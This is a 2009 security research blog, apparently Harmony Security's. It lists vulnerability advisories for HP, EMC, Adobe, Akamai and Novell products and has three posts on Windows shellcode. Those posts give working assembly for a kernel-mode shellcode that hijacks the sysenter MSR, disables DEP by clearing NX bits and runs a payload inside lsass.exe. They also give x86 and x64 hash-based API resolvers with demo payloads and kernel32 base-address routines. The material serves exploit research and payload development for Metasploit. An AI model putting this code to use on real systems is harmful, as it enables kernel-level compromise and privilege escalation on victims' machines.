Wednesday, 9 December 2009

HP Application Recovery Manager Stack Buffer Overflow Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for a remote pre authentication stack buffer overflow vulnerability in the Hewlett-Packard Application Recovery Manager which leads to arbitrary code execution. This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-091/

And the HP advisory here:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909

Interestingly, HP only report this as a remote Denial of Service vulnerability while both ZDI and Harmony Security have confirmed it as a remote code execution vulnerability.

Monday, 23 November 2009

HP Operations Manager Backdoor Account Code Execution Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for a remote SYSTEM code execution vulnerability in the Hewlett-Packard Operations Manager Server for Windows, due principally to the presence of a hidden user account in the servers Apache Tomcat installation. Code execution is achieved via an arbitrary file upload using the credentials of the hidden user account. This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-085/

Thursday, 5 November 2009

Implementing a Win32 Kernel Shellcode

Introduction

This blog post will discuss the implementation of a win32 kernel mode shellcode which will deliver an independent user mode payload. Most of the techniques used in this shellcode are discussed in the excellent 2005 paper 'Kernel-mode Payloads on Windows' by bugcheck and skape. The shellcode works against all current Windows kernels and we will see how several assumptions regarding memory locations, can be made in order to both store the kernel mode shellcode as well as disable DEP for the user mode portions.

The shellcode will work as follows. After gaining arbitrary code execution we will initially migrate out of the current kernel thread we are executing in by hijacking the sysenter Model Specific Register (MSR). Now whenever a user mode process performs a system call via the sysenter instruction, our kernel mode stager will get control. This stager will determine if it should hijack the user mode threads return address for the system call. If it does our user mode stager will get control and determine if it is executing in a predetermined SYSTEM process. If it is, the kernel mode sysenter hook is removed before finally executing the user mode payload. Should the user mode payload return cleanly, the hijacked user mode thread may resume execution normally.

Kernel Mode Migration

For our shellcode to work correctly we make several decisions as to where the shellcode will be placed in memory. From within kernel mode we will place our shellcode beginning at address 0xFFDF0400 which resides within the kernels Hardware Abstraction Layer (HAL) memory region. This memory is both writable and executable. It has the extra property of being mapped into the shared user data region (With a WinDbg symbol of SharedUserData, beginning at address 0x7FFE0000) of all user mode processes and as such can also be addressed from user mode using the address 0x7FFE0400 (We advance 0x400 bytes past the beginning of SharedUserData to avoid overwriting the critical information held there). From user mode on a Physical Address Extension (PAE) enabled system this memory will have the NX bit set marking it not executable as shown below in Listing 1. However we can easily overcome this in our kernel mode stager as described later. These addresses are not effected by ASLR and are static across all current versions of Windows.

kd> !pte 0xFFDF0400
VA ffdf0400
PDE at 00000000C0603FF0 PTE at 00000000C07FEF80
contains 0000000000127063 contains 0000000000152163
pfn 127 ---DA--KWEV pfn 152 -G-DA—KWEV <- Executable bit is set
kd> !pte 0x7FFE0400
VA 7ffe0400
PDE at 00000000C0601FF8 PTE at 00000000C03FFF00
contains 000000003D283867 contains 8000000000152005
pfn 3d283 ---DA--UWEV pfn 152 -------UR-V <- Executable bit is not set

To hijack the sysenter MSR as shown below in Listing 2, we first read the value of the current sysenter MSR and save it to a known location so as we can restore it later. As we already know where we will place our kernel mode stager we proceed to set this value as the new sysenter MSR. We then copy our kernel mode stager and user mode stager over to this known location (0xFFDF0400). Finally we place the current kernel thread we are in into a halted state to avoid any stability issues should we instead attempt to either kill the thread or resume the threads execution.

ring0_migrate_start:
cld
cli
jmp short ring0_migrate_bounce
ring0_migrate_patch:
pop esi // pop off ring0_stager_start address
// get current sysenter msr (nt!KiFastCallEntry)
push 0x176 // SYSENTER_EIP_MSR
pop ecx
rdmsr
// save original sysenter msr (nt!KiFastCallEntry)
mov dword [esi+( ring0_stager_data - ring0_stager_start )+0], eax
// retrieve the address in kernel memory where we will write the ring0 stager + ring3 code
mov edi, dword [esi+( ring0_stager_data - ring0_stager_start )+4]
// patch sysenter msr to be our stager
mov eax, edi
wrmsr
// copy over stager to shared memory
mov ecx, ( ring3_stager - ring0_stager_start )
rep movsb
sti // set interrupt flag
ring0_migrate_idle:
hlt // Halt this thread to avoid problems.
jmp short ring0_migrate_idle
ring0_migrate_bounce:
call ring0_migrate_patch // call the patch code, pushing the ring0_stager_start address to stack

Kernel Mode Staging

With both our kernel mode and user mode stagers resident in memory and the sysenter MSR hijacked, our kernel mode stager will get control upon any user mode process issuing a sysenter instruction. The kernel mode stager, shown below in Listing 3, will act as a proxy to the real sysenter function (nt!KiFastCallEntry), first preserving the state of the CPU before performing its actions and then restoring the state of the CPU and returning into the original sysenter function. The kernel mode stager will check to see if the user mode process which issued the system call, is instructing the stager to remove the sysenter MSR hook. The user mode stager, described later, will use this feature before executing the user mode payload. If the sysenter MSR hook is to be removed the address of the original sysenter function is restored to the correct MSR before the kernel mode stager returns. If the hook is not to be removed the kernel mode stager will determine if the return address for the user mode thread that issued the sysenter is to be patched in order to execute the user mode stager. How this is determined is to examine if the user mode return address from the system call is to a single RET instruction (As opposed to a 'RET 4' or 'RET 8' or any other instructions). This is to insure that the user mode stager can resume the hijacked user mode thread correctly if the user mode stager chooses not to execute the user mode payload (e.g. when not running in a SYSTEM process). This works because the user mode stager will also perform a single RET instruction when it is finished. If the kernel mode stager is to hijack the user mode return address, the address of the user mode stager is patched over the original return address held in the user mode threads stack (pointed to by EDX during a sysenter). Finally we must bypass DEP if we are running on a PAE enabled system so that the user mode stager can execute correctly. We can use the CPUID instruction to determine if the current CPU supports the NX bit. If it does we clear the NX bit from the Page Table Entry (PTE) which is associated with the user mode stager. Windows does not use any form of ASLR for the base of either its Page Directories or Tables which begin at 0xC0600000 and 0xC0000000 respectively on PAE enabled systems (Refer to page 771 of 'Windows Internals, Fifth Edition' by Mark Russinovich, David Solomin and Alex Ionescu). Knowing the address of the user mode stager (0x7FFE0400 + the length of the kernel mode stager), we can therefore determine the static address for the corresponding PTE, which will be 0xC03FFF00. By clearing the NX bit in this PTE we can disable DEP protection for the user mode stager.

ring0_stager_start:
push byte 0 // alloc a dword for the patched return address
pushfd // save flags and registers
pushad
call ring0_stager_eip
ring0_stager_eip:
pop eax
// patch in the real nt!KiFastCallEntry address as our return address
mov ebx, dword [eax + ( ring0_stager_data - ring0_stager_eip ) + 0]
mov [ esp + 36 ], ebx
cmp ecx, 0xDEADC0DE // see if we should remove sysenter hook
jne ring0_stager_hook
push 0x176 // SYSENTER_EIP_MSR
pop ecx
mov eax, ebx // set sysenter msr to be the real nt!KiFastCallEntry
xor edx, edx
wrmsr
xor eax, eax // clear eax (the syscall number) so we can continue
jmp short ring0_stager_finish
ring0_stager_hook: // get the original r3 ret address
mov esi, [ edx ] // (edx is the ring3 stack pointer)
movzx ebx, byte [ esi ] // determine if the return is to a "ret"
cmp bx, 0xC3
// only insert ring3 stager hook if we are to return to a single ret
jne short ring0_stager_finish
// calculate our r3 address in shared memory
mov ebx, dword [eax + ( ring0_stager_data - ring0_stager_eip ) + 8]
lea ebx, [ ebx + ring3_start - ring0_stager_start ]
mov [ edx ], ebx // patch in our r3 stage as the r3 return address
mov eax, 0x80000001
cpuid // detect if NX is present (clobbers eax,ebx,ecx,edx)...
and edx, 0x00100000 // bit 20 is the NX bit
jz short ring0_stager_finish
// modify the correct PTE to make our ring3 stager executable
mov edx, 0xC03FFF00 // we can default to this for now
add edx, 4
and dword [ edx ], 0x7FFFFFFF // clear the NX bit
ring0_stager_finish:
popad // restore registers
popfd // restore flags
ret // return to real nt!KiFastCallEntry
ring0_stager_data:
dd 0xFFFFFFFF // saved nt!KiFastCallEntry
dd 0xFFDF0400 // kernel memory address of stager
dd 0x7FFE0400 // shared user memory address of stager

User Mode Staging

We now have our user mode stager executing in every thread in the system that issues a system call which returns to a single RET instruction. We examine the file path held in the Process Environment Block (PEB) of the current process to see if we are executing in a process which should be running with SYSTEM privileges. If we are not running in such a process the user mode stager will simply return, resuming the current threads execution correctly. If we are executing in a privileged process we proceed to issue a special system call in order to instruct the kernel mode stager to remove the sysenter hook. We then execute the user mode payload.

ring3_start:
pushad
push byte 0x30
pop eax
cdq // zero edx
mov ebx, [ fs : eax ] // get the PEB
cmp [ ebx + 0xC ], edx
jz ring3_finish
mov eax, [ ebx + 0x10 ] // get pointer to the ProcessParameters
mov eax, [ eax + 0x3C ] // get the current processes ImagePathName
// advance past '*:\windows\system32\'
add eax, byte 0x28 // (we assume this as we want a system process).
// compute a simple hash of the name (skapes technique).
mov ecx, [ eax ] // get first 2 wide chars of name 'l\x00s\x00'
add ecx, [ eax + 0x3 ] // and add '\x00a\x00s'
cmp ecx, 'lass' // check the hash, default to hash('lsass.exe')
// if we are not in the correct process, return to real caller.
jne ring3_finish
// otherwise we first remove our ring0 sysenter hook.
call ring3_cleanup
// and then call the real ring3 payload.
call ring3_stager
// should the payload return we can resume this thread correctly.
jmp ring3_finish
ring3_cleanup:
mov ecx, 0xDEADC0DE // set the magic value for ecx
mov edx, esp // save our esp in edx for sysenter
sysenter // now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller).
ring3_finish:
popad
ret // return to the original system calls caller
ring3_stager:
// ...ring3 payload here...
ret

Mitigation's

Several mitigation's could be made in the kernel to make this type of shellcode unviable, although once arbitrary code execution has been gained mitigation's usually act more as an obstacle rather then being truly preventative.

  • Both the Page Directories and Page Tables could have some form of ASLR employed so as determining Page Table Entries would be non trivial. This would help ensure DEP could not be circumvented when running the user mode stager. However, as the physical address of the page directory is held in the CR3 register it should be possible to resolve it to a virtual address programmatically.
  • The kernel mode mapping of SharedUserData could be marked as not executable, removing the location where the kernel stager goes resident. However the respective PTE could still be modified to overcome this. Furthermore the entire HAL memory region should be subject to ASLR so as predetermined addresses cannot be chosen by the attacker.
  • The kernel mode mapping of SharedUserData could not be mapped across all process address spaces, instead a separate user mode only mapping could be present for each processes SharedUserData region and mapped back into kernel memory only if needed. This could prevent the user mode stager from being 'injected' into each user mode process.

Download

http://www.harmonysecurity.com/files/win32_kernel_shellcode.asm

Thursday, 29 October 2009

EMC & OpenText Hummingbird STR Service Stack Overflow Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for a remote pre authentication stack buffer overflow vulnerability that leads to SYSTEM code execution in the Hummingbird STR Service. The vulnerable service is deployed by multiple vendor products, specifically EMC Documentum eRoom, OpenText Hummingbird and OpenText Search Server. This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-074/

Wednesday, 23 September 2009

Adobe RoboHelp Server Arbitrary File Upload and Execute Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for an arbitrary file upload vulnerability that leads to SYSTEM code execution in the Adobe RoboHelp Server which was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-066/

And the Adobe advisory here:
http://www.adobe.com/support/security/bulletins/apsb09-14.html

Wednesday, 5 August 2009

Calling API Functions

Introduction

An alternative approach for position independent code, such as shellcode, to call Windows API functions is shown below. Their are all ready many existing methods available, typically relying on parsing either the Import Address Table (IAT) or Export Address Table (EAT) of a specific module in order to locate the address of a required function. Some methods use a variation of the above where the kernel32 modules EAT (or a modules IAT entry referencing kernel32) is parsed in order to locate the functions LoadLibraryA and GetProcAddress and these two functions are then used to resolve the remaining function addresses (as well as loading in any modules not all ready present in the processes address space). If relying on GetProcAddress to resolve functions, the ASCII names of the functions must also be available, increasing the shellcodes size considerably. It is therefore common to use a hashing technique, typically based off the assembly rotate (ROR/ROL) instructions, in order to avoid this problem and create a more optimized solution.

The 2003 paper 'Understanding Windows Shellcode' by Skape[1] is an excellent read to understand the various techniques fully. A good example of a well optimized shellcode is SkyLined's w32-bind-ngs-shellcode[2].

An Alternative Approach

Another way to resolve function addresses is to use a hash combined of both the desired function name and its module name. The entire list of modules loaded in a process can be iterated over, calculating the respective hash value for each exported function and comparing it to that of the desired hash we are searching for. Once located we can proceed to resolve the functions address. Further more, we can wrap this functionality in a function which will act as a proxy, allowing the caller to indirectly call the desired API function. A pseudo x86 code example of using this technique is shown below on the left and for comparison a more traditional approach of achieving the same is shown on the right.

push param2 // push the second parameter
push param1 // push the first parameter
push hash // push the hash of the function+module
call api_call // resolve and indirectly call the desired function
push hash // push the hash of the function + module
push module_address // push the address of the module
call resolve_api_address // resolve the desired function
push param2 // push the second parameter
push param1 // push the first parameter
call api_address // directly call the desired function

We can see from the above that their are some advantages, namely it takes only one call to both resolve and call any API function. We also do not need to keep track of any modules base addresses.

All the source code shown below can be downloaded from this zip file CallingAPIFunctions.zip. Also included in the zip are the x86 and x64 versions of the eggtest application used to run and aid debugging of shellcode.

Implementation – Win32 x86

Listed below is a 137 byte implementation of the technique described above. This implementation works on all versions of 32-bit Windows (Windows 7, 2008, Vista, 2003, XP, 2000, NT4). It is implemented as a function called 'api_call'. Its parameters are the hash value of the desired API function to call as well as all the desired API functions parameters. It returns the result of indirectly calling the desired API function. The stdcall calling convention (Used by all Win32 API functions) is honored in that the EAX, ECX and EDX registers are expected to be clobbered while the remaining registers will not be clobbered.

[BITS 32]

api_call:
pushad // We preserve all the registers for the caller, bar EAX and ECX.
mov ebp, esp // Create a new stack frame
xor edx, edx // Zero EDX
mov edx, [fs:edx+48] // Get a pointer to the PEB
mov edx, [edx+12] // Get PEB->Ldr
mov edx, [edx+20] // Get the first module from the InMemoryOrder module list
next_mod:
mov esi, [edx+40] // Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] // Set ECX to the length we want to check
xor edi, edi // Clear EDI which will store the hash of the module name
loop_modname:
xor eax, eax // Clear EAX
lodsb // Read in the next byte of the name
cmp al, 'a' // Some versions of Windows use lower case module names
jl not_lowercase
sub al, 0x20 // If so normalise to uppercase
not_lowercase:
ror edi, 13 // Rotate right our hash value
add edi, eax // Add the next byte of the name
loop loop_modname // Loop untill we have read enough
// We now have the module hash computed
push edx // Save the current position in the module list for later
push edi // Save the current module hash for later
// Proceed to itterate the export address table,
mov edx, [edx+16] // Get this modules base address
mov eax, [edx+60] // Get PE header
add eax, edx // Add the modules base address
mov eax, [eax+120] // Get export tables RVA
test eax, eax // Test if no export address table is present
jz get_next_mod1 // If no EAT present, process the next module
add eax, edx // Add the modules base address
push eax // Save the current modules EAT
mov ecx, [eax+24] // Get the number of function names
mov ebx, [eax+32] // Get the rva of the function names
add ebx, edx // Add the modules base address
// Computing the module hash + function hash
get_next_func:
jecxz get_next_mod // When we reach the start of the EAT (we search backwards), process the next module
dec ecx // Decrement the function name counter
mov esi, [ebx+ecx*4] // Get rva of next module name
add esi, edx // Add the modules base address
xor edi, edi // Clear EDI which will store the hash of the function name
// And compare it to the one we want
loop_funcname:
xor eax, eax // Clear EAX
lodsb // Read in the next byte of the ASCII function name
ror edi, 13 // Rotate right our hash value
add edi, eax // Add the next byte of the name
cmp al, ah // Compare AL (the next byte from the name) to AH (null)
jne loop_funcname // If we have not reached the null terminator, continue
add edi, [ebp-8] // Add the current module hash to the function hash
cmp edi, [ebp+36] // Compare the hash to the one we are searchnig for
jnz get_next_func // Go compute the next function hash if we have not found it
// If found, fix up stack, call the function and then value else compute the next one...
pop eax // Restore the current modules EAT
mov ebx, [eax+36] // Get the ordinal table rva
add ebx, edx // Add the modules base address
mov cx, [ebx+2*ecx] // Get the desired functions ordinal
mov ebx, [eax+28] // Get the function addresses table rva
add ebx, edx // Add the modules base address
mov eax, [ebx+4*ecx] // Get the desired functions RVA
add eax, edx // Add the modules base address to get the functions actual VA
// We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax // Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx // Clear off the current modules hash
pop ebx // Clear off the current position in the module list
popad // Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx // Pop off the origional return address our caller will have pushed
pop edx // Pop off the hash value our caller will have pushed
push ecx // Push back the correct return value
jmp eax // Jump into the required function
// We now automagically return to the correct caller...
get_next_mod:
pop eax // Pop off the current (now the previous) modules EAT
get_next_mod1:
pop edi // Pop off the current (now the previous) modules hash
pop edx // Restore our position in the module list
mov edx, [edx] // Get the next module
jmp short next_mod // Process this module


Example - Win32 x86

Using the implementation given above (and assuming it has been saved to a file called 'x86_api_call.asm'), we can build a simple example which will execute the calc program and then terminate the process.

[BITS 32]
[ORG 0]

cld // clear the direction flag
call start // call start, this pushes the address of 'api_call' onto the stack
delta:
%include "./x86_api_call.asm"
start:
pop ebp // pop off the address of 'api_call' for calling later

push byte +1 // push the command show parameter
lea eax, [ebp+command-delta] // calculate an address to the command line
push eax // push the command line parameter
push 0x876F8B31 // push the hash value for WinExec
call ebp // kernel32.dll!WinExec( &command, SW_NORMAL )

push byte 0 // push the desired exit code parameter
push 0x56A2B5F0 // push the hash value for ExitProcess
call ebp // call kernel32.dll!ExitProcess( 0 )

command:
db "calc.exe", 0


We can build the above example using the NASM assembler[4] with the command:
>nasm -f bin -O3 -o x86_example.bin x86_example.asm
We can run the example with the eggtest (included in zip file) program:
>eggtest_x86.exe x86_example.bin

Implementation - Win64 x64

We can of course use the same technique on 64bit Windows. Listed below is a 192 byte implementation of the technique described above for the x64 architecture. As before, it is implemented as a function called 'api_call'. The Win64 API use quite a different calling convention[3] to that of the Win32 API. The first four parameters to any function are passed in via the registers RCX, RDX, R8 and R9 respectively, with any remaining parameters being pushed onto the stack (Their are exception to this convention for floating point parameters). Another notable difference when coding for Win64 is that the Process Environment Block (PEB) must be retrieved from gs:96 as opposed to fs:48 on Win32. The desired functions hash value is passed in via register R10 in order to allow the registers RCX, RDX, R8 and R9 to be used for the desired function parameters. We can note that the hash values used do not need to be changed between architectures.

[BITS 64]

api_call:
push r9 // Save the 4th parameter
push r8 // Save the 3rd parameter
push rdx // Save the 2nd parameter
push rcx // Save the 1st parameter
push rsi // Save RSI
xor rdx, rdx // Zero rdx
mov rdx, [gs:rdx+96] // Get a pointer to the PEB
mov rdx, [rdx+24] // Get PEB->Ldr
mov rdx, [rdx+32] // Get the first module from the InMemoryOrder module list
next_mod:
mov rsi, [rdx+80] // Get pointer to modules name (unicode string)
movzx rcx, word [rdx+74] // Set rcx to the length we want to check
xor r9, r9 // Clear r9 which will store the hash of the module name
loop_modname:
xor rax, rax // Clear rax
lodsb // Read in the next byte of the name
cmp al, 'a' // Some versions of Windows use lower case module names
jl not_lowercase
sub al, 0x20 // If so normalise to uppercase
not_lowercase:
ror r9d, 13 // Rotate right our hash value
add r9d, eax // Add the next byte of the name
loop loop_modname // Loop untill we have read enough
// We now have the module hash computed
push rdx // Save the current position in the module list for later
push r9 // Save the current module hash for later
// Proceed to itterate the export address table,
mov rdx, [rdx+32] // Get this modules base address
mov eax, dword [rdx+60] // Get PE header
add rax, rdx // Add the modules base address
mov eax, dword [rax+136] // Get export tables RVA
test rax, rax // Test if no export address table is present
jz get_next_mod1 // If no EAT present, process the next module
add rax, rdx // Add the modules base address
push rax // Save the current modules EAT
mov ecx, dword [rax+24] // Get the number of function names
mov r8d, dword [rax+32] // Get the rva of the function names
add r8, rdx // Add the modules base address
// Computing the module hash + function hash
get_next_func:
jrcxz get_next_mod // When we reach the start of the EAT (we search backwards), process the next module
dec rcx // Decrement the function name counter
mov esi, dword [r8+rcx*4]// Get rva of next module name
add rsi, rdx // Add the modules base address
xor r9, r9 // Clear r9 which will store the hash of the function name
// And compare it to the one we want
loop_funcname:
xor rax, rax // Clear rax
lodsb // Read in the next byte of the ASCII function name
ror r9d, 13 // Rotate right our hash value
add r9d, eax // Add the next byte of the name
cmp al, ah // Compare AL (the next byte from the name) to AH (null)
jne loop_funcname // If we have not reached the null terminator, continue
add r9, [rsp+8] // Add the current module hash to the function hash
cmp r9d, r10d // Compare the hash to the one we are searchnig for
jnz get_next_func // Go compute the next function hash if we have not found it
// If found, fix up stack, call the function and then value else compute the next one...
pop rax // Restore the current modules EAT
mov r8d, dword [rax+36] // Get the ordinal table rva
add r8, rdx // Add the modules base address
mov cx, [r8+2*rcx] // Get the desired functions ordinal
mov r8d, dword [rax+28] // Get the function addresses table rva
add r8, rdx // Add the modules base address
mov eax, dword [r8+4*rcx]// Get the desired functions RVA
add rax, rdx // Add the modules base address to get the functions actual VA
// We now fix up the stack and perform the call to the drsired function...
finish:
pop r8 // Clear off the current modules hash
pop r8 // Clear off the current position in the module list
pop rsi // Restore RSI
pop rcx // Restore the 1st parameter
pop rdx // Restore the 2nd parameter
pop r8 // Restore the 3rd parameter
pop r9 // Restore the 4th parameter
pop r10 // pop off the return address
sub rsp, 32 // reserve space for the four register params (4 * sizeof(QWORD) = 32)
// It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
push r10 // push back the return address
jmp rax // Jump into the required function
// We now automagically return to the correct caller...
get_next_mod: //
pop rax // Pop off the current (now the previous) modules EAT
get_next_mod1:
pop r9 // Pop off the current (now the previous) modules hash
pop rdx // Restore our position in the module list
mov rdx, [rdx] // Get the next module
jmp next_mod // Process this module


Example - Win64 x64

Using the x64 implementation given above (and assuming it has been saved to a file called 'x64_api_call.asm'), we can build another simple example which will execute the calc program and then terminate the process.

[BITS 64]
[ORG 0]

cld // clear the direction flag
and rsp, 0xFFFFFFFFFFFFFFF0 // Ensure RSP is 16 byte aligned
call start // call start, this pushes the address of 'api_call' onto the stack
delta:
%include "./x64_api_call.asm"
start:
pop rbp // pop off the address of 'api_call' for calling later

mov rdx, 1 // param 2 is the command show parameter
lea rcx, [rbp+command-delta] // param 1 is the address to the command line
mov r10d, 0x876F8B31 // R10 = the hash value for WinExec
call rbp // WinExec( &command, 1 );

mov rcx, 0 // set the exit function parameter
mov r10d, 0x6F721347 // R10 = the hash value for RtlExitUserThread
call rbp // call ntdll.dll!RtlExitUserThread( 0 )

command:
db "calc.exe", 0


We can build the above example using the NASM assembler with the command:
>nasm -f bin -O3 -o x64_example.bin x64_example.asm
We can run the example with the eggtest (included in zip file) program:
>eggtest_x64.exe x64_example.bin

Forwarded Exports

Modules may contain entries in their EAT which is actually a forwarded entry[5]. This means that instead of a modules export resolving to a function within that module, this export is instead intended to resolve to a function within another module. For example on Windows Vista, 2008 and 7 the export kernel32.dll!ExitThread is a forwarded export that points to ntdll.dll!RtlExitUserThread. This is achieved by storing the ASCII module name and function name that the forwarded export wishes to point to in the respective EAT entry (instead of an RVA). I am unaware of any shellcode implementations that attempt to resolve forwarded exports correctly (unless using kernel32.dll!GetProcAddress) and the implementation given above does not resolve forwarded exports either. It gets awkward quickly as you must first recognize that the export is a forwarded one, proceed to use LoadLibraryA to load the forwarded module (in order to retrieve its base address, and load it into the processes address space if it is not all ready present) and then GetProcAddress to resolve the forwarded function based off the ASCII function name given.

For typical shellcodes the only function required which is a forwarded export is ExitThread as mentioned above. A workaround for this problem is to check at run time the current Windows platform and call the appropriate function to avoid calling a forwarded export as shown in the Win32 snippet below:

exitfunk:
mov ebx, 0x0A2A1DE0 // The EXITFUNK as patched in by the user...
push 0x9DBD95A6 // hash( "kernel32.dll", "GetVersion" )
call ebp // GetVersion(); (AL will = major version and AH will = minor version)
cmp al, byte 6 // If we are not running on Windows Vista, 2008 or 7
jl short goodbye // Then just call the exit function...
cmp bl, 0xE0 // If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne short goodbye
mov ebx, 0x6F721347 // Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye: // We now perform the actual call to the exit function
push byte 0 // push the exit function parameter
push ebx // push the hash of the exit function
call ebp // call EXITFUNK( 0 );


Hash Collisions

An obvious concern when using hash values in the manner described here, is the occurrence of collisions between the hash of the function you are searching for and an arbitrary function in an arbitrary module which computes to the same hash value. To help determine the possibility of this, a simple python script can be used to scan all modules on a system, computing their exported functions hashes and detecting if a collision occurs against any predefined functions (e.g. common functions we might need to use such as kernel32.dll!WinExec or ws2_32!recv). The python script is included in the zip file (see start of this post) and uses the pefile package[6] to process a modules exports. This script has been run on multiple systems (Windows 7 RC1, 2008 SP1, Vista SP2, 2003 SP2, XP SP3, 2000 SP4 and NT4 SP6a), processing a total of 1,864,417 functions across 35,178 modules and detected no collisions against the functions defined (Please see the python script for more details).

Metasploit Integration

The majority of the Metasploit[7] x86 Windows payloads have been rewritten using the techniques presented here in order to bring Windows 7 and backwards compatibility to the stagers, stages and singles as well as considerable size reductions for the stagers and stages. Work on x64 payloads is under way.

References

[1] http://hick.org/code/skape/papers/win32-shellcode.pdf
[2] http://code.google.com/p/w32-bind-ngs-shellcode/
[3] http://msdn.microsoft.com/en-us/library/9b372w95.aspx
[4] http://sourceforge.net/projects/nasm/
[5] http://msdn.microsoft.com/en-us/magazine/cc301808.aspx
[6] http://code.google.com/p/pefile/
[7] http://www.metasploit.com/

Wednesday, 22 July 2009

Akamai Download Manager Stack Buffer Overflow Vulnerability

iDefense have published an advisory for a stack buffer overflow vulnerability in the Akamai Download Manager which was discovered by Stephen Fewer of Harmony Security. The vulnerability effects the ActiveX version of the download manager (Versions <= 2.2.3.7) and results in arbitrary code execution through the victims browser after the victim visits a malicious web page.

You can read the full iDefense advisory here:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=813

And the Akamai advisory here:
http://seclists.org/bugtraq/2009/Jul/0165.html
http://www.akamai.com/html/support/security.html

Novell Privileged User Manager Remote DLL Injection Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for a critical remote pre-authentication arbitrary DLL injection vulnerability in the Novell Privileged User Manager which was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-046/

And the Novell advisory here:
http://www.novell.com/support/viewContent.do?externalId=7003640

Friday, 19 June 2009

Retrieving Kernel32's Base Address

For shellcode, a common method to resolve the addresses of library functions needed, is to get the base address of the kernel32.dll image in memory and retrieve the addresses of GetProcAddress and LoadLibraryA by parsing the kernel32 images Export Address Table (EAT). These two functions can then be used to resolve the remaining functions needed by the shellcode. To retrieve the kernel32.dll base address most shellcodes use the Process Environment Block (PEB) structure to retrieve a list of modules currently loaded in the processes address space. The InInitializationOrder module list pointed to by the PEB's Ldr structure holds a linked list of modules. Typically the second entry in this list has always been that of kernel32.dll. The code used to retrieve the kernel32 base address based on this method is shown below:

xor ebx, ebx // clear ebx
mov ebx, fs:[ 0x30 ] // get a pointer to the PEB
mov ebx, [ ebx + 0x0C ] // get PEB->Ldr
mov ebx, [ ebx + 0x1C ] // get PEB->Ldr.InInitializationOrderModuleList.Flink (1st entry)
mov ebx, [ ebx ] // get the next entry (2nd entry)
mov ebx, [ ebx + 0x08 ] // get the 2nd entries base address (kernel32.dll)

This method has worked for all versions of Windows from Windows 2000 up to and including Windows Vista. The introduction of Windows 7 (rc1) has broken this method of retrieving the kernel32 base address due to the new MinWin kernel structure employed by Windows 7. A new module kernelbase.dll is loaded before kernel32.dll and as such appears in the second entry of the InInitializationOrder module list.

To retrieve the kernel32.dll base address in a generic manner on all versions of Windows from Windows 2000 up to and including Windows 7 (rc1) a slightly modified approach can be used. Instead of parsing the PEB's InInitializationOrder module list, the InMemoryOrder module list can be parsed instead. The third entry in this list will always be that of kernel32.dll (The first being that of the main module and the second being that of ntdll.dll). The code used to retrieve the kernel32 base address based on this method is shown below:

xor ebx, ebx // clear ebx
mov ebx, fs:[ 0x30 ] // get a pointer to the PEB
mov ebx, [ ebx + 0x0C ] // get PEB->Ldr
mov ebx, [ ebx + 0x14 ] // get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
mov ebx, [ ebx ] // get the next entry (2nd entry)
mov ebx, [ ebx ] // get the next entry (3rd entry)
mov ebx, [ ebx + 0x10 ] // get the 3rd entries base address (kernel32.dll)

Update: Their appears to be some cases on Windows 2000 whereby the above method will not yield the correct result. A more robust method, albeit a more lengthy one, can be seen below. We search the InMemoryOrder module list for the kernel32 module using a hash of the module name for comparison. We also normalise the module name to uppercase as some systems store module names in uppercase and some in lowercase.

cld // clear the direction flag for the loop
xor edx, edx // zero edx

mov edx, [fs:edx+0x30] // get a pointer to the PEB
mov edx, [edx+0x0C] // get PEB->Ldr
mov edx, [edx+0x14] // get the first module from the InMemoryOrder module list
next_mod:
mov esi, [edx+0x28] // get pointer to modules name (unicode string)
push byte 24 // push down the length we want to check
pop ecx // set ecx to this length for the loop
xor edi, edi // clear edi which will store the hash of the module name
loop_modname:
xor eax, eax // clear eax
lodsb // read in the next byte of the name
cmp al, 'a' // some versions of Windows use lower case module names
jl not_lowercase
sub al, 0x20 // if so normalise to uppercase
not_lowercase:
ror edi, 13 // rotate right our hash value
add edi, eax // add the next byte of the name to the hash
loop loop_modname // loop until we have read enough
cmp edi, 0x6A4ABC5B // compare the hash with that of KERNEL32.DLL
mov ebx, [edx+0x10] // get this modules base address
mov edx, [edx] // get the next module
jne next_mod // if it doesn't match, process the next module

// when we get here EBX is the kernel32 base (or change to suit).

To verify these methods on your own system you can use the following tool: GetKernel32Base.zip

This code has been verified on the following systems:

  • Windows 2000 SP4
  • Windows XP SP2
  • Windows XP SP3
  • Windows 2003 SP2
  • Windows Vista SP1
  • Windows 2008 SP1
  • Windows 7 RC1

The following WinDbg session shows how we can manually verify the above methods on a Windows 7 RC1 system:

0:004> version
Windows 7 Version 7100 UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7100.0 (winmain_win7rc.090421-1700)
...

// list the loaded modules...
0:004> lm
start end module name
00d20000 00de0000 calc (pdb symbols)
70930000 70a77000 msxml6 (pdb symbols)
725c0000 725fc000 oleacc (pdb symbols)
73e10000 73e42000 WINMM (pdb symbols)
73e50000 73f49000 WindowsCodecs (pdb symbols)
74170000 74183000 dwmapi (pdb symbols)
742c0000 74450000 gdiplus (pdb symbols)
74450000 74490000 UxTheme (pdb symbols)
